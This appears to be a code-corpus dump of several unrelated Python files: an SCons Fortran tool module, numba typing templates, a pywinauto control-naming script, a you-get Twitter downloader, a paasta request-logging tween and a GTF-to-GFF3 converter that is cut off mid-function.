if 'F90FILESUFFIXES' not in env:
env['F90FILESUFFIXES'] = ['.i90']
else:
env['F90FILESUFFIXES'].append('.i90')
add_all_to_env(env)
env['FORTRAN'] = 'ifl'
env['SHFORTRAN'] = '$FORTRAN'
env['FORTRANCOM'] = '$FORTRAN $FORTRANFLAGS $_FORTRANINCFLAGS /c $SOURCES /Fo$TARGET'
env['FORTRANPPCOM'] = '$FORTRAN $FORTRANFLAGS $CPPFLAGS $_CPPDEFFLAGS $_FORTRANINCFLAGS /c $SOURCES /Fo$TARGET'
env['SHFORTRANCOM'] = '$SHFORTRAN $SHFORTRANFLAGS $_FORTRANINCFLAGS /c $SOURCES /Fo$TARGET'
env['SHFORTRANPPCOM'] = '$SHFORTRAN $SHFORTRANFLAGS $CPPFLAGS $_CPPDEFFLAGS $_FORTRANINCFLAGS /c $SOURCES /Fo$TARGET'
def exists(env):
return env.Detect('ifl')
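# Usage sketch (illustrative): like other SCons tool modules, this one is
# normally activated from a SConstruct via the tools list rather than imported
# directly, e.g.
#
#     env = Environment(tools=['ifl'])
#     env.Program('hello', ['hello.i90'])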
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| 0.004274 |
from __future__ import print_function, division, absolute_import
import itertools
from numba import types, intrinsics
from numba.utils import PYVERSION, RANGE_ITER_OBJECTS, operator_map
from numba.typing.templates import (AttributeTemplate, ConcreteTemplate,
AbstractTemplate, builtin_global, builtin,
builtin_attr, signature, bound_function,
make_callable_template)
for obj in RANGE_ITER_OBJECTS:
builtin_global(obj, types.range_type)
builtin_global(len, types.len_type)
builtin_global(slice, types.slice_type)
builtin_global(abs, types.abs_type)
builtin_global(print, types.print_type)
@builtin
class Print(ConcreteTemplate):
key = types.print_type
intcases = [signature(types.none, ty) for ty in types.integer_domain]
realcases = [signature(types.none, ty) for ty in types.real_domain]
cases = intcases + realcases
@builtin
class PrintOthers(AbstractTemplate):
key = types.print_type
def accepted_types(self, ty):
if ty in types.integer_domain or ty in types.real_domain:
return True
if isinstance(ty, types.CharSeq):
return True
def generic(self, args, kws):
assert not kws, "kwargs to print is not supported."
for a in args:
if not self.accepted_types(a):
raise TypeError("Type %s is not printable." % a)
return signature(types.none, *args)
@builtin
class Abs(ConcreteTemplate):
key = types.abs_type
int_cases = [signature(ty, ty) for ty in types.signed_domain]
real_cases = [signature(ty, ty) for ty in types.real_domain]
complex_cases = [signature(ty.underlying_float, ty)
for ty in types.complex_domain]
cases = int_cases + real_cases + complex_cases
@builtin
class Slice(ConcreteTemplate):
key = types.slice_type
cases = [
signature(types.slice3_type),
signature(types.slice3_type, types.none, types.none),
signature(types.slice3_type, types.none, types.intp),
signature(types.slice3_type, types.intp, types.none),
signature(types.slice3_type, types.intp, types.intp),
signature(types.slice3_type, types.intp, types.intp, types.intp),
signature(types.slice3_type, types.none, types.intp, types.intp),
signature(types.slice3_type, types.intp, types.none, types.intp),
signature(types.slice3_type, types.none, types.none, types.intp),
]
@builtin
class Range(ConcreteTemplate):
key = types.range_type
cases = [
signature(types.range_state32_type, types.int32),
signature(types.range_state32_type, types.int32, types.int32),
signature(types.range_state32_type, types.int32, types.int32,
types.int32),
signature(types.range_state64_type, types.int64),
signature(types.range_state64_type, types.int64, types.int64),
signature(types.range_state64_type, types.int64, types.int64,
types.int64),
signature(types.unsigned_range_state64_type, types.uint64),
signature(types.unsigned_range_state64_type, types.uint64, types.uint64),
signature(types.unsigned_range_state64_type, types.uint64, types.uint64,
types.uint64),
]
@builtin
class GetIter(AbstractTemplate):
key = "getiter"
def generic(self, args, kws):
assert not kws
[obj] = args
if isinstance(obj, types.IterableType):
return signature(obj.iterator_type, obj)
@builtin
class IterNext(AbstractTemplate):
key = "iternext"
def generic(self, args, kws):
assert not kws
[it] = args
if isinstance(it, types.IteratorType):
return signature(types.Pair(it.yield_type, types.boolean), it)
@builtin
class PairFirst(AbstractTemplate):
"""
    Given a heterogeneous pair, return the first element.
"""
key = "pair_first"
def generic(self, args, kws):
assert not kws
[pair] = args
if isinstance(pair, types.Pair):
return signature(pair.first_type, pair)
@builtin
class PairSecond(AbstractTemplate):
"""
    Given a heterogeneous pair, return the second element.
"""
key = "pair_second"
def generic(self, args, kws):
assert not kws
[pair] = args
if isinstance(pair, types.Pair):
return signature(pair.second_type, pair)
def choose_result_bitwidth(*inputs):
return max(types.intp.bitwidth, *(tp.bitwidth for tp in inputs))
def choose_result_int(*inputs):
"""
Choose the integer result type for an operation on integer inputs,
according to the integer typing NBEP.
"""
bitwidth = choose_result_bitwidth(*inputs)
signed = any(tp.signed for tp in inputs)
return types.Integer.from_bitwidth(bitwidth, signed)
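# Illustrative examples of the rule on a 64-bit machine (types.intp.bitwidth
# == 64); results follow directly from choose_result_bitwidth and the
# signedness check above:
#
#     choose_result_int(types.int32, types.int32)    # -> int64 (widened to intp)
#     choose_result_int(types.uint32, types.uint64)  # -> uint64 (all unsigned)
#     choose_result_int(types.int64, types.uint64)   # -> int64 (any signed input)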
# The "machine" integer types to take into consideration for operator typing
# (according to the integer typing NBEP)
machine_ints = (
sorted(set((types.intp, types.int64))) +
sorted(set((types.uintp, types.uint64)))
)
# Explicit integer rules for binary operators; smaller ints will be
# automatically upcast.
integer_binop_cases = tuple(
signature(choose_result_int(op1, op2), op1, op2)
for op1, op2 in itertools.product(machine_ints, machine_ints)
)
class BinOp(ConcreteTemplate):
cases = list(integer_binop_cases)
cases += [signature(op, op, op) for op in sorted(types.real_domain)]
cases += [signature(op, op, op) for op in sorted(types.complex_domain)]
@builtin
class BinOpAdd(BinOp):
key = "+"
@builtin
class BinOpSub(BinOp):
key = "-"
@builtin
class BinOpMul(BinOp):
key = "*"
@builtin
class BinOpDiv(BinOp):
key = "/?"
@builtin
class BinOpMod(ConcreteTemplate):
key = "%"
cases = list(integer_binop_cases)
cases += [signature(op, op, op) for op in sorted(types.real_domain)]
@builtin
class BinOpTrueDiv(ConcreteTemplate):
key = "/"
cases = [signature(types.float64, op1, op2)
for op1, op2 in itertools.product(machine_ints, machine_ints)]
cases += [signature(op, op, op) for op in sorted(types.real_domain)]
cases += [signature(op, op, op) for op in sorted(types.complex_domain)]
@builtin
class BinOpFloorDiv(ConcreteTemplate):
key = "//"
cases = list(integer_binop_cases)
cases += [signature(op, op, op) for op in sorted(types.real_domain)]
@builtin
class BinOpPower(ConcreteTemplate):
key = "**"
cases = list(integer_binop_cases)
cases += [signature(types.float64, types.float64, op)
for op in sorted(types.signed_domain)]
cases += [signature(types.float64, types.float64, op)
for op in sorted(types.unsigned_domain)]
cases += [signature(op, op, op)
for op in sorted(types.real_domain)]
cases += [signature(op, op, op)
for op in sorted(types.complex_domain)]
class PowerBuiltin(BinOpPower):
key = pow
# TODO add 3 operand version
builtin_global(pow, types.Function(PowerBuiltin))
class BitwiseShiftOperation(ConcreteTemplate):
cases = list(integer_binop_cases)
@builtin
class BitwiseLeftShift(BitwiseShiftOperation):
key = "<<"
@builtin
class BitwiseRightShift(BitwiseShiftOperation):
key = ">>"
class BitwiseLogicOperation(BinOp):
cases = list(integer_binop_cases)
@builtin
class BitwiseAnd(BitwiseLogicOperation):
key = "&"
@builtin
class BitwiseOr(BitwiseLogicOperation):
key = "|"
@builtin
class BitwiseXor(BitwiseLogicOperation):
key = "^"
# Bitwise invert and negate are special: we must not upcast the operand
# for unsigned numbers, as that would change the result.
# (i.e. ~np.int8(0) == 255 but ~np.int32(0) == 4294967295).
@builtin
class BitwiseInvert(ConcreteTemplate):
key = "~"
cases = [signature(types.int8, types.boolean)]
cases += [signature(choose_result_int(op), op) for op in types.unsigned_domain]
cases += [signature(choose_result_int(op), op) for op in types.signed_domain]
class UnaryOp(ConcreteTemplate):
cases = [signature(choose_result_int(op), op) for op in types.unsigned_domain]
cases += [signature(choose_result_int(op), op) for op in types.signed_domain]
cases += [signature(op, op) for op in sorted(types.real_domain)]
cases += [signature(op, op) for op in sorted(types.complex_domain)]
@builtin
class UnaryNegate(UnaryOp):
key = "-"
@builtin
class UnaryPositive(UnaryOp):
key = "+"
@builtin
class UnaryNot(ConcreteTemplate):
key = "not"
cases = [signature(types.boolean, types.boolean)]
cases += [signature(types.boolean, op) for op in sorted(types.signed_domain)]
cases += [signature(types.boolean, op) for op in sorted(types.unsigned_domain)]
cases += [signature(types.boolean, op) for op in sorted(types.real_domain)]
cases += [signature(types.boolean, op) for op in sorted(types.complex_domain)]
class OrderedCmpOp(ConcreteTemplate):
cases = [signature(types.boolean, types.boolean, types.boolean)]
cases += [signature(types.boolean, op, op) for op in sorted(types.signed_domain)]
cases += [signature(types.boolean, op, op) for op in sorted(types.unsigned_domain)]
cases += [signature(types.boolean, op, op) for op in sorted(types.real_domain)]
class UnorderedCmpOp(ConcreteTemplate):
cases = OrderedCmpOp.cases + [
signature(types.boolean, op, op) for op in sorted(types.complex_domain)]
@builtin
class CmpOpLt(OrderedCmpOp):
key = '<'
@builtin
class CmpOpLe(OrderedCmpOp):
key = '<='
@builtin
class CmpOpGt(OrderedCmpOp):
key = '>'
@builtin
class CmpOpGe(OrderedCmpOp):
key = '>='
@builtin
class CmpOpEq(UnorderedCmpOp):
key = '=='
@builtin
class CmpOpNe(UnorderedCmpOp):
key = '!='
class TupleCompare(AbstractTemplate):
def generic(self, args, kws):
[lhs, rhs] = args
if isinstance(lhs, types.BaseTuple) and isinstance(rhs, types.BaseTuple):
for u, v in zip(lhs, rhs):
# Check element-wise comparability
res = self.context.resolve_function_type(self.key, (u, v), {})
if res is None:
break
else:
return signature(types.boolean, lhs, rhs)
@builtin
class TupleEq(TupleCompare):
key = '=='
@builtin
class TupleNe(TupleCompare):
key = '!='
@builtin
class TupleGe(TupleCompare):
key = '>='
@builtin
class TupleGt(TupleCompare):
key = '>'
@builtin
class TupleLe(TupleCompare):
key = '<='
@builtin
class TupleLt(TupleCompare):
key = '<'
# Register default implementations of binary inplace operators for
# immutable types.
class InplaceImmutable(AbstractTemplate):
def generic(self, args, kws):
lhs, rhs = args
if not lhs.mutable:
return self.context.resolve_function_type(self.key[:-1], args, kws)
# Inplace ops on mutable arguments must be typed explicitly
for _binop, _inp, op in operator_map:
if _inp:
template = type('InplaceImmutable_%s' % _binop,
(InplaceImmutable,),
dict(key=op + '='))
builtin(template)
class CmpOpIdentity(AbstractTemplate):
def generic(self, args, kws):
[lhs, rhs] = args
return signature(types.boolean, lhs, rhs)
@builtin
class CmpOpIs(CmpOpIdentity):
key = 'is'
@builtin
class CmpOpIsNot(CmpOpIdentity):
key = 'is not'
def normalize_1d_index(index):
"""
Normalize the *index* type (an integer or slice) for indexing a 1D
sequence.
"""
if index == types.slice3_type:
return types.slice3_type
elif isinstance(index, types.Integer):
return types.intp if index.signed else types.uintp
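# e.g. (illustrative): normalize_1d_index(types.int32) -> types.intp,
# normalize_1d_index(types.uint8) -> types.uintp, while types.slice3_type
# passes through unchanged.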
@builtin
class GetItemCPointer(AbstractTemplate):
key = "getitem"
def generic(self, args, kws):
assert not kws
ptr, idx = args
if isinstance(ptr, types.CPointer) and isinstance(idx, types.Integer):
return signature(ptr.dtype, ptr, normalize_1d_index(idx))
@builtin
class SetItemCPointer(AbstractTemplate):
key = "setitem"
def generic(self, args, kws):
assert not kws
ptr, idx, val = args
if isinstance(ptr, types.CPointer) and isinstance(idx, types.Integer):
return signature(types.none, ptr, normalize_1d_index(idx), ptr.dtype)
@builtin
class Len(AbstractTemplate):
key = types.len_type
def generic(self, args, kws):
assert not kws
(val,) = args
if isinstance(val, (types.Buffer, types.BaseTuple)):
return signature(types.intp, val)
@builtin
class TupleBool(AbstractTemplate):
key = "is_true"
def generic(self, args, kws):
assert not kws
(val,) = args
if isinstance(val, (types.BaseTuple)):
return signature(types.boolean, val)
#-------------------------------------------------------------------------------
@builtin_attr
class MemoryViewAttribute(AttributeTemplate):
key = types.MemoryView
if PYVERSION >= (3,):
def resolve_contiguous(self, buf):
return types.boolean
def resolve_c_contiguous(self, buf):
return types.boolean
def resolve_f_contiguous(self, buf):
return types.boolean
def resolve_itemsize(self, buf):
return types.intp
def resolve_nbytes(self, buf):
return types.intp
def resolve_readonly(self, buf):
return types.boolean
def resolve_shape(self, buf):
return types.UniTuple(types.intp, buf.ndim)
def resolve_strides(self, buf):
return types.UniTuple(types.intp, buf.ndim)
def resolve_ndim(self, buf):
return types.intp
#-------------------------------------------------------------------------------
@builtin_attr
class BooleanAttribute(AttributeTemplate):
key = types.Boolean
def resolve___class__(self, ty):
return types.NumberClass(ty)
@builtin_attr
class NumberAttribute(AttributeTemplate):
key = types.Number
def resolve___class__(self, ty):
return types.NumberClass(ty)
def resolve_real(self, ty):
return getattr(ty, "underlying_float", ty)
def resolve_imag(self, ty):
return getattr(ty, "underlying_float", ty)
@bound_function("complex.conjugate")
def resolve_conjugate(self, ty, args, kws):
assert not args
assert not kws
return signature(ty)
@builtin_attr
class SliceAttribute(AttributeTemplate):
key = types.slice3_type
def resolve_start(self, ty):
return types.intp
def resolve_stop(self, ty):
return types.intp
def resolve_step(self, ty):
return types.intp
#-------------------------------------------------------------------------------
@builtin_attr
class NumberClassAttribute(AttributeTemplate):
key = types.NumberClass
def resolve___call__(self, classty):
"""
Resolve a number class's constructor (e.g. calling int(...))
"""
ty = classty.instance_type
def typer(val):
return ty
return types.Function(make_callable_template(key=ty, typer=typer))
def register_number_classes(register_global):
nb_types = set(types.number_domain)
nb_types.add(types.bool_)
for ty in nb_types:
register_global(ty, types.NumberClass(ty))
register_number_classes(builtin_global)
#------------------------------------------------------------------------------
class Max(AbstractTemplate):
key = max
def generic(self, args, kws):
assert not kws
# max(a, b, ...)
if len(args) < 2:
return
for a in args:
if a not in types.number_domain:
return
retty = self.context.unify_types(*args)
if retty is not None:
return signature(retty, *args)
class Min(AbstractTemplate):
key = min
def generic(self, args, kws):
assert not kws
# min(a, b, ...)
if len(args) < 2:
return
for a in args:
if a not in types.number_domain:
return
retty = self.context.unify_types(*args)
if retty is not None:
return signature(retty, *args)
class Round(ConcreteTemplate):
key = round
if PYVERSION < (3, 0):
cases = [
signature(types.float32, types.float32),
signature(types.float64, types.float64),
]
else:
cases = [
signature(types.intp, types.float32),
signature(types.int64, types.float64),
]
cases += [
signature(types.float32, types.float32, types.intp),
signature(types.float64, types.float64, types.intp),
]
builtin_global(max, types.Function(Max))
builtin_global(min, types.Function(Min))
builtin_global(round, types.Function(Round))
#------------------------------------------------------------------------------
class Bool(AbstractTemplate):
key = bool
def generic(self, args, kws):
assert not kws
[arg] = args
if isinstance(arg, (types.Boolean, types.Number)):
return signature(types.boolean, arg)
# XXX typing for bool cannot be polymorphic because of the
# types.Function thing, so we redirect to the "is_true"
# intrinsic.
return self.context.resolve_function_type("is_true", args, kws)
class Int(AbstractTemplate):
key = int
def generic(self, args, kws):
assert not kws
[arg] = args
if isinstance(arg, types.Integer):
return signature(arg, arg)
if isinstance(arg, (types.Float, types.Boolean)):
return signature(types.intp, arg)
class Float(AbstractTemplate):
key = float
def generic(self, args, kws):
assert not kws
[arg] = args
if arg not in types.number_domain:
raise TypeError("float() only support for numbers")
if arg in types.complex_domain:
raise TypeError("float() does not support complex")
if arg in types.integer_domain:
return signature(types.float64, arg)
elif arg in types.real_domain:
return signature(arg, arg)
class Complex(AbstractTemplate):
key = complex
def generic(self, args, kws):
assert not kws
if len(args) == 1:
[arg] = args
if arg not in types.number_domain:
raise TypeError("complex() only support for numbers")
if arg == types.float32:
return signature(types.complex64, arg)
else:
return signature(types.complex128, arg)
elif len(args) == 2:
[real, imag] = args
if (real not in types.number_domain or
imag not in types.number_domain):
raise TypeError("complex() only support for numbers")
if real == imag == types.float32:
return signature(types.complex64, real, imag)
else:
return signature(types.complex128, real, imag)
builtin_global(bool, types.Function(Bool))
builtin_global(int, types.Function(Int))
builtin_global(float, types.Function(Float))
builtin_global(complex, types.Function(Complex))
#------------------------------------------------------------------------------
@builtin
class Enumerate(AbstractTemplate):
key = enumerate
def generic(self, args, kws):
assert not kws
it = args[0]
        if len(args) > 1 and args[1] not in types.integer_domain:
            raise TypeError("Only integers supported as start value in "
                            "enumerate")
        elif len(args) > 2:
            # let Python raise its own error
            enumerate(*args)
if isinstance(it, types.IterableType):
enumerate_type = types.EnumerateType(it)
return signature(enumerate_type, *args)
builtin_global(enumerate, types.Function(Enumerate))
@builtin
class Zip(AbstractTemplate):
key = zip
def generic(self, args, kws):
assert not kws
if all(isinstance(it, types.IterableType) for it in args):
zip_type = types.ZipType(args)
return signature(zip_type, *args)
builtin_global(zip, types.Function(Zip))
@builtin
class Intrinsic_array_ravel(AbstractTemplate):
key = intrinsics.array_ravel
def generic(self, args, kws):
assert not kws
[arr] = args
if arr.layout in 'CF' and arr.ndim >= 1:
return signature(arr.copy(ndim=1), arr)
builtin_global(intrinsics.array_ravel, types.Function(Intrinsic_array_ravel))
#------------------------------------------------------------------------------
@builtin
class TypeBuiltin(AbstractTemplate):
key = type
def generic(self, args, kws):
assert not kws
if len(args) == 1:
# One-argument type() -> return the __class__
try:
classty = self.context.resolve_getattr(args[0], "__class__")
except KeyError:
return
else:
return signature(classty, *args)
builtin_global(type, types.Function(TypeBuiltin))
| 0.001973 |
# GUI Application automation and testing library
# Copyright (C) 2006 Mark Mc Mahon
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public License
# as published by the Free Software Foundation; either version 2.1
# of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc.,
# 59 Temple Place,
# Suite 330,
# Boston, MA 02111-1307 USA
from application import FindWindows
win = FindWindows(title = "Replace", class_name = "#32770")[0]
from findbestmatch import find_best_match
# get those visible controls that have visible window text
visibleTextChildren = [w for w in win.Children if w.IsVisible and w.Text]
# get those visible controls that do not have visible window text
visibleNonTextChildren = [w for w in win.Children if w.IsVisible and not w.Text]
distance_cutoff = 999
def FindClosestControl(ctrl, text_ctrls):
    name = ctrl.FriendlyClassName()
    closest = distance_cutoff
    # now for each of the visible text controls
    for text_ctrl in text_ctrls:
        # get aliases to the control rectangles
        text_r = text_ctrl.Rectangle()
        ctrl_r = ctrl.Rectangle()
        # skip controls where the text control is to the right of ctrl
        if text_r.left >= ctrl_r.right:
            continue
        # skip controls where the text control is below ctrl
        if text_r.top >= ctrl_r.bottom:
            continue
        # calculate the distance between the controls: (x^2 + y^2)^.5
        distance = ((text_r.left - ctrl_r.left) ** 2 +
                    (text_r.top - ctrl_r.top) ** 2) ** .5
        # if this distance was closer than the last one
        if distance < closest:
            closest = distance
            name = text_ctrl.Text.replace(' ', '').replace('&', '') + ctrl.FriendlyClassName()
    return name
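# Usage sketch (illustrative): the loop below performs the same search inline,
# but the helper can also be called directly, e.g.
#
#     for ctrl in visibleNonTextChildren:
#         print FindClosestControl(ctrl, visibleTextChildren)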
# for each of the items that do not have visible text
for w2 in visibleNonTextChildren:
    closest = 999
    newname = ''
    # now for each of the visible text controls
    for text_child in visibleTextChildren:
        wr = text_child.Rectangle()
        w2r = w2.Rectangle()
        # skip controls where text_child is to the right of w2
        if wr.left >= w2r.right:
            continue
        # skip controls where text_child is below w2
        if wr.top >= w2r.bottom:
            continue
        # calculate the distance to the control
        distance = ((wr.left - w2r.left) ** 2.0 + (wr.top - w2r.top) ** 2.0) ** .5
        # if this distance was closer than the last one
        if distance < closest:
            closest = distance
            newname = text_child.Text.replace(' ', '').replace('&', '') + w2.FriendlyClassName()
    if closest != 999:
        print newname
#!/usr/bin/env python
__all__ = ['twitter_download']
from ..common import *
from .vine import vine_download
def extract_m3u(source):
r1 = get_content(source)
s1 = re.findall(r'(/ext_tw_video/.*)', r1)
r2 = get_content('https://video.twimg.com%s' % s1[-1])
s2 = re.findall(r'(/ext_tw_video/.*)', r2)
return ['https://video.twimg.com%s' % i for i in s2]
def twitter_download(url, output_dir='.', merge=True, info_only=False, **kwargs):
html = get_html(url)
screen_name = r1(r'data-screen-name="([^"]*)"', html) or \
r1(r'<meta name="twitter:title" content="([^"]*)"', html)
item_id = r1(r'data-item-id="([^"]*)"', html) or \
r1(r'<meta name="twitter:site:id" content="([^"]*)"', html)
page_title = "{} [{}]".format(screen_name, item_id)
try: # extract images
urls = re.findall(r'property="og:image"\s*content="([^"]+:large)"', html)
assert urls
images = []
for url in urls:
url = ':'.join(url.split(':')[:-1]) + ':orig'
filename = parse.unquote(url.split('/')[-1])
title = '.'.join(filename.split('.')[:-1])
ext = url.split(':')[-2].split('.')[-1]
size = int(get_head(url)['Content-Length'])
images.append({'title': title,
'url': url,
'ext': ext,
'size': size})
size = sum([image['size'] for image in images])
print_info(site_info, page_title, images[0]['ext'], size)
if not info_only:
for image in images:
title = image['title']
ext = image['ext']
size = image['size']
url = image['url']
print_info(site_info, title, ext, size)
download_urls([url], title, ext, size,
output_dir=output_dir)
except: # extract video
# always use i/cards or videos url
if not re.match(r'https?://twitter.com/i/', url):
url = r1(r'<meta\s*property="og:video:url"\s*content="([^"]+)"', html)
if not url:
url = 'https://twitter.com/i/videos/%s' % item_id
html = get_content(url)
data_config = r1(r'data-config="([^"]*)"', html) or \
r1(r'data-player-config="([^"]*)"', html)
i = json.loads(unescape_html(data_config))
if 'video_url' in i:
source = i['video_url']
if not item_id: page_title = i['tweet_id']
elif 'playlist' in i:
source = i['playlist'][0]['source']
if not item_id: page_title = i['playlist'][0]['contentId']
elif 'vmap_url' in i:
vmap_url = i['vmap_url']
vmap = get_content(vmap_url)
source = r1(r'<MediaFile>\s*<!\[CDATA\[(.*)\]\]>', vmap)
if not item_id: page_title = i['tweet_id']
elif 'scribe_playlist_url' in i:
scribe_playlist_url = i['scribe_playlist_url']
return vine_download(scribe_playlist_url, output_dir, merge=merge, info_only=info_only)
try:
urls = extract_m3u(source)
except:
urls = [source]
size = urls_size(urls)
mime, ext = 'video/mp4', 'mp4'
print_info(site_info, page_title, mime, size)
if not info_only:
download_urls(urls, page_title, ext, size, output_dir, merge=merge)
site_info = "Twitter.com"
download = twitter_download
download_playlist = playlist_not_supported('twitter')
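# Usage sketch (hypothetical URL): as with other you-get extractors,
# info_only=True prints site/title/size without downloading.
#
#     twitter_download('https://twitter.com/some_user/status/123',
#                      output_dir='.', info_only=True)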
| 0.003951 |
# Copyright 2015-2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Creates a tween that logs information about requests.
"""
import json
import traceback
from datetime import datetime
import pyramid
import pytz
from paasta_tools.api import settings
try:
import clog
except ImportError:
clog = None
DEFAULT_REQUEST_LOG_NAME = "tmp_paasta_api_requests"
def includeme(config):
if clog is not None:
config.add_tween(
"paasta_tools.api.tweens.request_logger.request_logger_tween_factory",
under=pyramid.tweens.INGRESS,
)
class request_logger_tween_factory:
"""Tween that logs information about requests"""
def __init__(self, handler, registry):
self.handler = handler
self.registry = registry
self.log_name = registry.settings.get(
"request_log_name", DEFAULT_REQUEST_LOG_NAME,
)
def _log(
self, timestamp=None, level="INFO", additional_fields=None,
):
if clog is not None:
# `settings` values are set by paasta_tools.api.api:setup_paasta_api
if not timestamp:
timestamp = datetime.now(pytz.utc)
dct = {
"human_timestamp": timestamp.strftime("%Y-%m-%dT%H:%M:%S%Z"),
"unix_timestamp": timestamp.timestamp(),
"hostname": settings.hostname,
"level": level,
"cluster": settings.cluster,
}
if additional_fields is not None:
dct.update(additional_fields)
line = json.dumps(dct, sort_keys=True)
clog.log_line(self.log_name, line)
def __call__(self, request):
start_time = datetime.now(pytz.utc) # start clock for response time
request_fields = {
"path": request.path,
"params": request.params.mixed(),
"client_addr": request.client_addr,
"http_method": request.method,
"headers": dict(request.headers), # incls user agent
}
response_fields = {}
log_level = "INFO"
try:
response = self.handler(request)
response_fields["status_code"] = response.status_int
if 300 <= response.status_int < 400:
log_level = "WARNING"
elif 400 <= response.status_int < 600:
log_level = "ERROR"
response_fields["body"] = response.body.decode("utf-8")
return response
except Exception as e:
log_level = "ERROR"
response_fields.update(
{
"status_code": 500,
"exc_type": type(e).__name__,
"exc_info": traceback.format_exc(),
}
)
raise
finally:
response_time_ms = (
datetime.now(pytz.utc) - start_time
).total_seconds() * 1000
response_fields["response_time_ms"] = response_time_ms
self._log(
timestamp=start_time,
level=log_level,
additional_fields={
"request": request_fields,
"response": response_fields,
},
)
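# Illustrative shape of one emitted log line (keys come from _log/__call__
# above; the values here are made up):
#
#     {"cluster": "example-cluster", "hostname": "host-1",
#      "human_timestamp": "2021-01-01T00:00:00UTC", "level": "INFO",
#      "request": {"path": "/v1/services", ...},
#      "response": {"status_code": 200, "response_time_ms": 12.3, ...},
#      "unix_timestamp": 1609459200.0}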
| 0.000528 |
#!/usr/bin/env python
"""
Convert Gene Transfer Format [GTF] to Generic Feature Format Version 3 [GFF3].
Usage: python gtf_to_gff_conv.py in.gtf > out.gff3
Requirement:
Copyright (C)
2009-2012 Friedrich Miescher Laboratory of the Max Planck Society, Tubingen, Germany.
2012-2013 Memorial Sloan-Kettering Cancer Center New York City, USA.
"""
import sys
import re
from common_util import _open_file, buildUTR, addCDSphase
def GFFWriter(gtf_file_cont):
"""
Write feature details to GFF3
"""
print '##gff-version 3'
for contig, contig_info in sorted(gtf_file_cont.items()): # chromosome
for feature, details in contig_info.items(): # gene with source
            gene_start, gene_stop = [], []  # separate lists; a chained `=` would alias them
            gnames = None
            tnames, transcript_details = dict(), dict()  # separate dicts for the same reason
for ftid, tinfo in details.items(): # transcripts
tinfo['exon'].sort() # coordinate system in ascending order.
tinfo['CDS'].sort()
if tinfo['exon']:
gene_start.append(tinfo['exon'][0][0])
gene_stop.append(tinfo['exon'][-1][1])
if not gene_start:
continue
orient = tinfo['info'][0]
tnames[ftid]=tinfo['info'][-1]
gnames=tinfo['info'][-2]
if len(tinfo['CDS']) == 0: # non coding transcript
transcript_details[ftid] = dict(info = tinfo['info'],
exon = tinfo['exon'],
tpe = 'transcript')
else:
                    if tinfo['sp_cod']: # stop codons are separated from the CDS; add the coordinates based on strand
if orient == '+':
if tinfo['sp_cod'][0][0]-tinfo['CDS'][-1][1] == 1:
tinfo['CDS'][-1] = (tinfo['CDS'][-1][0], tinfo['sp_cod'][0][1])
else:
tinfo['CDS'].append(tinfo['sp_cod'][0])
if orient == '-':
if tinfo['CDS'][0][0]-tinfo['sp_cod'][0][1] == 1:
tinfo['CDS'][0] = (tinfo['sp_cod'][0][0], tinfo['CDS'][0][1])
else:
tinfo['CDS'].insert(0, tinfo['sp_cod'][0])
if tinfo['exon']:
utr5, utr3 = buildUTR(tinfo['CDS'], tinfo['exon'], orient) # getting UTR info from CDS and exon.
transcript_details[ftid] = dict(info = tinfo['info'],
exon = tinfo['exon'],
utr5 = utr5,
utr3 = utr3,
cds = tinfo['CDS'],
tpe = 'mRNA')
            if gene_start and gene_stop: # displaying gene, transcript and subfeatures
gene_start.sort()
gene_stop.sort()
                if gnames is None:
gnames = feature[0] # assign gene name as gene id, if not defined
pline = [str(contig),
feature[1],
'gene',
str(gene_start[0]),
str(gene_stop[-1]),
'.',
orient,
'.',
'ID=' + feature[0] + ';Name=' + gnames]
print '\t'.join(pline)
for dtid, dinfo in transcript_details.items():
if dinfo['info'][3]:
pline = [str(contig),
feature[1],
dinfo['tpe'],
str(dinfo['exon'][0][0]),
str(dinfo['exon'][-1][1]),
dinfo['info'][1],
orient,
'.',
'ID=' + str(dtid) + ';Parent=' + feature[0] + ';Name=' + str(dinfo['info'][3]) ]
else:
pline = [str(contig),
feature[1],
dinfo['tpe'],
str(dinfo['exon'][0][0]),
str(dinfo['exon'][-1][1]),
dinfo['info'][1],
orient,
'.',
'ID=' + dtid + ';Parent=' + feature[0]]
print '\t'.join(pline)
if 'utr5' in dinfo:
for ele in dinfo['utr5']:
pline = [str(contig),
feature[1],
'five_prime_UTR',
str(ele[0]),
str(ele[1]),
'.',
orient,
'.',
'Parent=' + dtid]
print '\t'.join(pline)
if 'cds' in dinfo:
cds_w_phase = addCDSphase(orient, dinfo['cds'])
for ele in cds_w_phase:
pline = [str(contig),
feature[1],
'CDS',
str(ele[0]),
str(ele[1]),
'.',
orient,
str(ele[-1]),
'Parent=' + dtid]
print '\t'.join(pline)
if 'utr3' in dinfo:
for ele in dinfo['utr3']:
pline = [str(contig),
feature[1],
'three_prime_UTR',
str(ele[0]),
str(ele[1]),
'.',
orient,
'.',
'Parent=' + dtid]
print '\t'.join(pline)
if 'exon' in dinfo:
intron_start = 0
for xq, ele in enumerate(dinfo['exon']):
if xq > 0:
pline = [str(contig),
feature[1],
'intron',
str(intron_start),
str(ele[0]-1),
'.',
orient,
'.',
'Parent=' + dtid]
print '\t'.join(pline)
pline = [str(contig),
feature[1],
'exon',
str(ele[0]),
str(ele[1]),
'.',
orient,
'.',
'Parent=' + dtid]
print '\t'.join(pline)
intron_start = ele[1]+1
def getGTFcontent(gtf_file):
"""
Extract GTF features
"""
GFH = _open_file(gtf_file)
gtf_content, recall = dict(), None
for rec in GFH:
rec = rec.strip('\n\r')
#skip empty line fasta identifier and commented line
if not rec or rec[0] in ['#', '>']:
continue
#skip the genome sequence
if not re.search('\t', rec):
continue
parts = rec.split('\t')
assert len(parts) >= 8, rec
